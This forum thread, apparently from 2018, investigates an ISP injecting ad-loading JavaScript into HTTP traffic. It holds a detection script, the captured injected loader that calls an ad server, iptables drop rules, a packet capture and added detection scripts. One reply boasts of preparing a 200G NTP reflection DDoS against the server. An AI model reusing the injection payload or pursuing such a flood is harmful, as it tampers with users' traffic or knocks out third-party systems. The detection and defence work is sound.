It is well known that Guangdong Telecom broadband randomly pops up ad windows (no screenshot; anyone who has seen it knows what I mean). Because it shows up fairly randomly it has never been easy to reproduce. I had some time these past few days to look into it and wrote a script that reproduces it:
#!/bin/bash
# bash is required: RANDOM is a bash builtin, not POSIX sh
host='mat1.gtimg.com'
path='/www/asset/seajs/sea.js'
referer='http://www.qq.com/'
useragent='Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'
while :
do
    # resolve the host and pick one of its IPv4 answers at random; only "Address: x.x.x.x"
    # answer lines are taken (the resolver's own "Address:<tab>...#53" line and any IPv6
    # answers, which would need brackets in the URL, are skipped)
    hostips=$(nslookup "$host" | grep -Po '(?<=Address: )[0-9.]+$')
    count=$(printf '%s\n' "$hostips" | grep -c .)
    # avoid a division by zero if resolution failed
    [ "$count" -gt 0 ] || { sleep 10; continue; }
    randresolv=$(printf '%s\n' "$hostips" | tail -n "$((1+RANDOM%count))" | head -n 1)
    date=$(date)
    # fetch the .js by IP with the real Host header and a Referer, which is the request
    # shape that gets hijacked; -N and --no-keepalive force a fresh connection each time
    content=$(curl -s -N --no-keepalive "http://$randresolv$path" -H "Host: $host" -H "User-Agent: $useragent" -H "Referer: $referer" -H 'Connection: keep-alive' -H 'Pragma: no-cache' -H 'Cache-Control: no-cache')
    # the injected script references an ad server in 183.59.x.x
    if printf '%s\n' "$content" | grep -q '183\.59'; then
        logtext="ChinaTelecom javascript hijacking detected - $randresolv - $date"
        printf '\n%s' "$logtext"
        printf '%s\n' "$logtext" >> ./checklog
        printf '%s\n' "$content" > ./capturedcontent
    else
        printf .
    fi
    sleep 10
done
Telecom only hijacks HTTP requests whose URL ends in .js and that carry a Referer header. Pick any .js on the web; I used SeaJS from the Tencent homepage as the example. Fill the corresponding values into the host, path and referer variables of the script and run it. After a while (it can take an hour or two) the hijack shows up; the hijack frequency is roughly one hijack at random in every 1 to 10 requests.
What it looks like while running: http://ww2.sinaimg.cn/large/0060lm7Tly1fptp6dvpy0j30h20933z0.jpg
The content substituted in after the hijack:
var _atn_obj_ = new Object;
_atn_obj_.oldurl = 'http://mat1.gtimg.com/www/asset/seajs/sea.js?cHVzaA=100745';
_atn_obj_.unified_url = 'http://183.59.53.197:3737/remind_adv/ad_unified_access?SP=ABzs...zoPP';
window.setTimeout(function(){var a=document.createElement("script");a.src=_atn_obj_.oldurl;document.getElementsByTagName("head")[0].appendChild(a);},0);
window.setTimeout(function(){var a=document.createElement("script");a.src=_atn_obj_.unified_url;document.getElementsByTagName("head")[0].appendChild(a);},0);
Not sure whether this counts as hard proof. If it does, I plan to complain to 10000 this weekend, and if that has no effect I will write a detailed report and complain to MIIT (工信部).
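A way to classify what the script saves in ./capturedcontent that does not depend on an IP substring, as an added example that is not part of the original post or the OP's script. It compares the body against a pinned SHA-256 of the genuine file (a hash the reader would have to take from a fetch they trust, for instance over HTTPS, since plain HTTP is what gets rewritten; here it is computed from a constructed stand-in body) and, failing that, looks for the `_atn_obj_` loader and pulls the ad-server host out of `unified_url`. Both sample bodies are constructed: the hijacked one is modelled on the injected script quoted in the post, the genuine one is a placeholder and not the real sea.js.

```shell
#!/bin/sh
# Added example (not the OP's script): classify a saved response body as genuine,
# hijacked, or otherwise modified, instead of grepping for an ad-server IP.
# Assumes sha256sum (coreutils) or shasum (perl/BSD) is installed.

# Constructed stand-in for the real sea.js; the real file's hash must be pinned
# from a fetch you trust (e.g. over HTTPS), because plain HTTP is what gets rewritten.
GENUINE_BODY='/* constructed stand-in for sea.js, not the real file */ (function(){window.seajs={version:"x"};})();'

# Constructed hijacked body, modelled on the injected script quoted in the post above.
HIJACKED_BODY=$(cat <<'EOF'
var _atn_obj_ = new Object;
_atn_obj_.oldurl = 'http://mat1.gtimg.com/www/asset/seajs/sea.js?cHVzaA=100745';
_atn_obj_.unified_url = 'http://183.59.53.197:3737/remind_adv/ad_unified_access?SP=ABzs...zoPP';
window.setTimeout(function(){var a=document.createElement("script");a.src=_atn_obj_.oldurl;document.getElementsByTagName("head")[0].appendChild(a);},0);
window.setTimeout(function(){var a=document.createElement("script");a.src=_atn_obj_.unified_url;document.getElementsByTagName("head")[0].appendChild(a);},0);
EOF
)

# body_sha256 BODY: hex SHA-256 of the body text. $(...) strips trailing newlines, so the
# pin and the later check must both go through this same function.
body_sha256() {
    if command -v sha256sum >/dev/null 2>&1; then
        printf '%s' "$1" | sha256sum | cut -d' ' -f1
    else
        printf '%s' "$1" | shasum -a 256 | cut -d' ' -f1
    fi
}

# ad_host BODY: host[:port] referenced by the injected unified_url, empty if absent.
ad_host() {
    printf '%s\n' "$1" | sed -n "s|.*unified_url *= *'http://\([^/']*\).*|\1|p" | head -n 1
}

# classify_body BODY PINNED_SHA256: prints one of
#   genuine                   body hash matches the pin
#   hijacked ad-server=HOST   body carries the _atn_obj_ loader seen in the injected script
#   modified                  hash mismatch without the known marker (a new injection
#                             template, or the genuine file was updated and the pin is stale)
classify_body() {
    body=$1
    pin=$2
    if [ "$(body_sha256 "$body")" = "$pin" ]; then
        echo genuine
    elif printf '%s\n' "$body" | grep -q '_atn_obj_'; then
        echo "hijacked ad-server=$(ad_host "$body")"
    else
        echo modified
    fi
}

# Stand-alone demonstration: pin the stand-in's hash, then classify all three cases.
PIN=$(body_sha256 "$GENUINE_BODY")
classify_body "$GENUINE_BODY" "$PIN"
classify_body "$HIJACKED_BODY" "$PIN"
classify_body 'var x = 1;' "$PIN"
```

The "modified" outcome is the one worth logging separately: a stale pin after a legitimate sea.js update looks identical to an injection that no longer uses the `_atn_obj_` name, so the captured body should be kept for inspection rather than counted as clean.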
1
silencefent 2018-03-29 15:37:24 +08:00
Won't help.
2
LGA1150 2018-03-29 15:54:11 +08:00 via Android
Is it a 301/302 redirect? As a stopgap you can filter the forged early-answer packets with iptables on the router:
iptables -I FORWARD -p tcp --sport 80 -m string --string "Location: http://183.59.53." --algo bm -j DROP (remove the semicolon that V2 adds automatically yourself). You can also add a TTL match to reduce the load.
3
Telegram 2018-03-29 15:55:46 +08:00 via iPhone
At most they will add you to a whitelist and stop hijacking you. Getting them to stop this practice altogether is impossible.
6
yexm0 2018-03-29 16:07:09 +08:00 via iPhone
8
winterbells 2018-03-29 16:11:27 +08:00
"Telecom only hijacks URLs ending in .js" ———>
It probably differs by region. Blank pages get ads too, pages without a single character on them. The hijack also detects whether it is a mobile device; there is a js file that checks. Call customer service and just say "turn off the hijacking" and she will understand, although they never admitted to hijacking, only kept repeating that the data-center side would handle it.
9
mario85 OP
10
mario85 OP @winterbells Ads can appear even when you are doing nothing at all; it is just that the browser or some other background process loaded a js, got hijacked, and the ad popped straight up.
12
learnshare 2018-03-29 16:19:03 +08:00
Even if you complain, they will only deal with your household.
After all, money from privacy is easy money.
13
mario85 OP @learnshare I know plenty of people anyway. I will go have tea at someone's place, connect to their WiFi and run the script; if it still shows up there, the problem is not solved.
Tampering with user traffic seems to be illegal. Right now it is ads, but who knows whether they will quietly do other things. https://www.zhihu.com/question/20723856
14
hicdn 2018-03-29 16:27:19 +08:00
Stopping it is impossible; see the earlier case of the State Council app being hijacked.
16
learnshare 2018-03-29 17:11:53 +08:00
@mario85 They will certainly do other things; the more money the better, of course.
18
t895 2018-03-30 17:16:40 +08:00 via iPhone
Just put together an NTP reflection, about 200G; let's try hitting this server.
19
ShareDuck 2018-04-01 00:48:07 +08:00 via Android
On the ads issue, the first time it was only resolved after complaining to MIIT (工信部); after that, calling 10000 sorted it out.
20
qwertyegg 2018-04-01 12:08:04 +08:00
Would using OpenDNS solve this kind of thing?
21
feng0vx 2018-04-01 12:33:22 +08:00 via Android
Useless; even MIIT (工信部) is useless now. I complained about the ads, and they called back saying the contract has no clause about it, so they cannot do anything.
22
wr410 2018-04-01 13:36:07 +08:00
A blog post I wrote many years ago; skip straight to the end to get the idea:
https://blog.csdn.net/wr410/article/details/25594273
23
wolfie 2018-04-02 15:24:07 +08:00
You can get it turned off by calling customer service.
Even HTTPS gets hijacked; what privacy is there to speak of?
24
LGA1150 2018-05-24 01:05:40 +08:00
I think I have caught the hijack packets.
All the hijack packets seem to contain a variable "_atn_obj_", so I matched on that keyword with iptables:
iptables -A forwarding_rule -i pppoe-wan -p tcp --sport 80 -m string --string "_atn_obj_" --algo bm -j LOG
while keeping tcpdump running in the background, until this line showed up in the kernel log:
[54945.458949] IN=pppoe-wan OUT=ct MAC= SRC=119.23.80.130 DST=10.2.1.2 LEN=894 TOS=0x00 PREC=0x00 TTL=56 ID=9997 DF PROTO=TCP SPT=80 DPT=45021 WINDOW=256 RES=0x00 ACK PSH URGP=0
Then I filtered the capture:
00:35:20.051969 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [S], seq 296045250, win 64240, options [mss 1432,sackOK,TS val 3110253 ecr 0,nop,wscale 8], length 0
00:35:20.060124 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [S.], seq 4085280, ack 296045251, win 14600, options [mss 1444,nop,nop,sackOK,nop,wscale 7], length 0
00:35:20.071531 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [.], ack 1, win 251, length 0
00:35:20.073405 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [P.], seq 1:1530, ack 1, win 251, length 1529: HTTP: GET /static/image/mobile/styletouch.css HTTP/1.1
00:35:20.081913 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [.], ack 1433, win 137, length 0
00:35:20.082025 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [.], ack 1530, win 137, length 0
00:35:20.094693 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 1:245, ack 1530, win 137, length 244: HTTP: HTTP/1.1 304 Not Modified
00:35:20.106128 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [.], ack 245, win 256, length 0
00:35:20.110373 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [.], seq 1530:2962, ack 245, win 256, length 1432: HTTP: GET /static/assets/js/amazeui.min.js HTTP/1.1
00:35:20.110765 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [P.], seq 2962:3040, ack 245, win 256, length 78: HTTP
00:35:20.129094 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 245:1099, ack 2962, win 256, length 854: HTTP: HTTP/1.1 200 OK
00:35:20.129715 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [.], ack 3040, win 159, length 0
00:35:20.143467 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 245:490, ack 3040, win 159, length 245: HTTP: HTTP/1.1 304 Not Modified
00:35:20.150041 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [F.], seq 3040, ack 1099, win 262, length 0
00:35:20.154660 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [.], ack 1099, win 262, options [nop,nop,sack 1 {245:490}], length 0
00:35:20.361116 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [F.], seq 3040, ack 1099, win 262, length 0
00:35:20.361483 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 245:490, ack 3040, win 159, length 245: HTTP: HTTP/1.1 304 Not Modified
00:35:20.394913 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [.], ack 1099, win 262, options [nop,nop,sack 1 {245:490}], length 0
00:35:20.582203 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [F.], seq 3040, ack 1099, win 262, length 0
00:35:20.799507 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 245:490, ack 3040, win 159, length 245: HTTP: HTTP/1.1 304 Not Modified
00:35:20.817570 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [.], ack 1099, win 262, options [nop,nop,sack 1 {245:490}], length 0
00:35:21.021165 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [F.], seq 3040, ack 1099, win 262, length 0
00:35:21.675574 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 245:490, ack 3040, win 159, length 245: HTTP: HTTP/1.1 304 Not Modified
00:35:21.715799 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [.], ack 1099, win 262, options [nop,nop,sack 1 {245:490}], length 0
00:35:21.904377 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [F.], seq 3040, ack 1099, win 262, length 0
00:35:23.427507 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 245:490, ack 3040, win 159, length 245: HTTP: HTTP/1.1 304 Not Modified
00:35:23.454270 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [.], ack 1099, win 262, options [nop,nop,sack 1 {245:490}], length 0
00:35:26.931735 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 245:490, ack 3040, win 159, length 245: HTTP: HTTP/1.1 304 Not Modified
00:35:27.118104 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [R], seq 296048290, win 0, length 0
You can see that
00:35:20.129094 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 245:1099, ack 2962, win 256, length 854: HTTP: HTTP/1.1 200 OK
is the injected 200 response, while what the real server returned is
00:35:20.143467 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 245:490, ack 3040, win 159, length 245: HTTP: HTTP/1.1 304 Not Modified
Match packets on the keyword, TCP flags and TTL and DROP them:
iptables -A forwarding_rule -i pppoe-wan -p tcp --sport 80 -m ttl --ttl-eq 55 --tcp-flags ALL PSH,ACK -m string --string "_atn_obj_" --algo bm -j DROP
The servers hosting the ad content include 183.59.53.187, 183.59.53.188 and 183.59.53.224; the OP's is 183.59.53.197. Looks like the whole range can safely be blocked.
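The overlapping-sequence pattern in that capture can be checked mechanically. What follows is an added example, not part of the reply above or of any tool mentioned in the thread: an awk filter over tcpdump's default one-line output that flags any flow in which one side sends two data segments starting at the same relative sequence number but ending at different ones, which is what a forged response racing the genuine one looks like (the genuine 304 arrives later and overlaps the injected 200 at offset 245). The sample input is a subset of the packets quoted in reply 24, embedded as a constant; the format assumptions (fields 3 and 5 hold the endpoints, `seq a:b,` marks a data-carrying segment) hold for tcpdump run without -v or -x.

```shell
#!/bin/sh
# Added example, not from the thread: flag overlapping data segments in a tcpdump text
# capture. Works on tcpdump's default one-line output (no -v / -x); the expression
# 'tcp and src port 80' on a live capture keeps it to server->client traffic.

# Subset of the packets quoted in reply 24 (same flow, same values), used as sample input.
CAPTURE='00:35:20.073405 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [P.], seq 1:1530, ack 1, win 251, length 1529: HTTP: GET /static/image/mobile/styletouch.css HTTP/1.1
00:35:20.094693 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 1:245, ack 1530, win 137, length 244: HTTP: HTTP/1.1 304 Not Modified
00:35:20.110373 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [.], seq 1530:2962, ack 245, win 256, length 1432: HTTP: GET /static/assets/js/amazeui.min.js HTTP/1.1
00:35:20.110765 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [P.], seq 2962:3040, ack 245, win 256, length 78: HTTP
00:35:20.129094 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 245:1099, ack 2962, win 256, length 854: HTTP: HTTP/1.1 200 OK
00:35:20.143467 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 245:490, ack 3040, win 159, length 245: HTTP: HTTP/1.1 304 Not Modified
00:35:20.150041 IP 10.2.1.2.45021 > 119.23.80.130.80: Flags [F.], seq 3040, ack 1099, win 262, length 0
00:35:20.361483 IP 119.23.80.130.80 > 10.2.1.2.45021: Flags [P.], seq 245:490, ack 3040, win 159, length 245: HTTP: HTTP/1.1 304 Not Modified'

# find_overlaps: read tcpdump lines on stdin; for each (src, dst, seq-start) remember the
# first data segment seen, and report once per distinct later segment that starts at the
# same offset but ends elsewhere. Plain retransmissions (same start, same end) are ignored,
# as are SYN/FIN/ACK-only lines, whose "seq N," carries no a:b range.
find_overlaps() {
    awk '
    /seq [0-9]+:[0-9]+,/ {
        src = $3; dst = $5; sub(/:$/, "", dst)
        for (i = 1; i <= NF; i++) if ($i == "seq") { seq = $(i + 1); break }
        sub(/,$/, "", seq)
        split(seq, r, ":")                      # r[1] = start, r[2] = end (relative seq)
        key = src " > " dst " seq " r[1]
        p = index($0, "HTTP: ")
        info = p ? substr($0, p + 6) : "(no payload summary)"
        if (!(key in first_end)) { first_end[key] = r[2]; first_info[key] = info; next }
        if (r[2] != first_end[key] && !((key ":" r[2]) in reported)) {
            reported[key ":" r[2]] = 1
            printf "%s: first ends at %s (%s), later ends at %s (%s)\n",
                   key, first_end[key], first_info[key], r[2], info
        }
    }'
}

# scan_sample: run the filter over the embedded capture.
scan_sample() {
    printf '%s\n' "$CAPTURE" | find_overlaps
}

scan_sample
```

On a router this can sit behind a live capture (`tcpdump -l -nn -i <wan interface> 'tcp and src port 80' | find_overlaps`, with -l for line buffering). The filter only says that two different payloads claimed the same offset; it cannot by itself say which copy is the forgery. In this capture the first-arriving copy was the 200 carrying the ad loader, and the client's TCP stack accepted it and SACKed the genuine 245:490 as already covered. Telling the two apart needs the IP TTL, which the default tcpdump line does not print; `tcpdump -v` shows it, and it is the same field reply 24's kernel-log line (TTL=56) and its `-m ttl` rule rely on.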